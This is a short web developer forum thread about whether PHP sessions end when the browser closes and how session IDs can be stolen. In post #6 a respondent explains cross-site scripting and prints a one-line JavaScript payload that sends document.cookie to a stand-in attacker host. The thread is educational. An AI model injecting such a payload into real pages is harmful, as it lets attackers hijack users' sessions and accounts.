Results 1 to 7 of 7

Thread: Session Variables

  1. #1
    Join Date
    Feb 2006
    Posts
    158
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default Session Variables

    When you have a session going and you exit out of the window does the session automatically session_destroy()?

  2. #2
    Join Date
    Jun 2005
    Location
    英国
    Posts
    11,878
    Thanks
    1
    Thanked 180 Times in 172 Posts
    Blog Entries
    2

    Default

    No, but if the browser considers itself to be closed it'll delete the cookie, which expires at the end of the browser session.
    Twey | I understand English | 日本語が分かります | mi jimpe fi le jbobau | mi esperanton komprenas | je comprends franšais | entiendo espa˝ol | t˘i Ýt hiểu tiếng Việt | ich verstehe ein bisschen Deutsch | beware XHTML | common coding mistakes | tutorials | various stuff | argh PHP!

  3. #3
    Join Date
    Feb 2006
    Posts
    158
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    So thats why when you close the window without logging out other people aren't automatically logged on with your session variables?

  4. #4
    Join Date
    Jun 2005
    Location
    英国
    Posts
    11,878
    Thanks
    1
    Thanked 180 Times in 172 Posts
    Blog Entries
    2

    Default

    That's right. Unless somebody steals your SID, they're not getting in. If you want to stop this effect, manually create a cookie to store the information.
    Twey | I understand English | 日本語が分かります | mi jimpe fi le jbobau | mi esperanton komprenas | je comprends franšais | entiendo espa˝ol | t˘i Ýt hiểu tiếng Việt | ich verstehe ein bisschen Deutsch | beware XHTML | common coding mistakes | tutorials | various stuff | argh PHP!

  5. #5
    Join Date
    Feb 2006
    Posts
    158
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    But there's very little chance of somebody actually stealing an SID right? I mean, how easy can it be to figure out just one actual SID that's in use?

  6. #6
    Join Date
    Jun 2005
    Location
    英国
    Posts
    11,878
    Thanks
    1
    Thanked 180 Times in 172 Posts
    Blog Entries
    2

    Default

    Not at all easy. There are ways to do it, however. The most widely publicised is XSS (also known as CSS, but I use XSS to avoid confusion): Cross-Site Scripting. This occurs when a site inadvertantly allows client-side scripting to be embedded in one of its pages. This could be something like this:
    Code:
    window.location.href = 'http://www.evilsite.com/stealsid.php?cookie=' + escape(document.cookie);
    When a user unwittingly executes the code, the cookie is transmitted to the malicious user's site, which can use PHP to extract and store the SID, and, if he uses it fast enough, hijack a session on the vulnerable site, bypassing the login procedure altogether. This is why most forums require their users to enter their password before modifying vital data, even if they're already logged in. A more advanced version of the script above is one that, using a server-side script to connect from the malicious user's server, automatically hijacks the session and changes the login details if possible, mitigating the need for the malicious user's intervention. Other tweaks can be made to the above setup too, of course, like using AJAX to do it all behind the scenes without the victim ever knowing.
    Twey | I understand English | 日本語が分かります | mi jimpe fi le jbobau | mi esperanton komprenas | je comprends franšais | entiendo espa˝ol | t˘i Ýt hiểu tiếng Việt | ich verstehe ein bisschen Deutsch | beware XHTML | common coding mistakes | tutorials | various stuff | argh PHP!

  7. #7
    Join Date
    Feb 2006
    Posts
    158
    Thanks
    0
    Thanked 0 Times in 0 Posts

    Default

    Wow. Intense. Well, considering what you just told me I think i'm just not going to worry about SID stealers.

    Thanks.

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •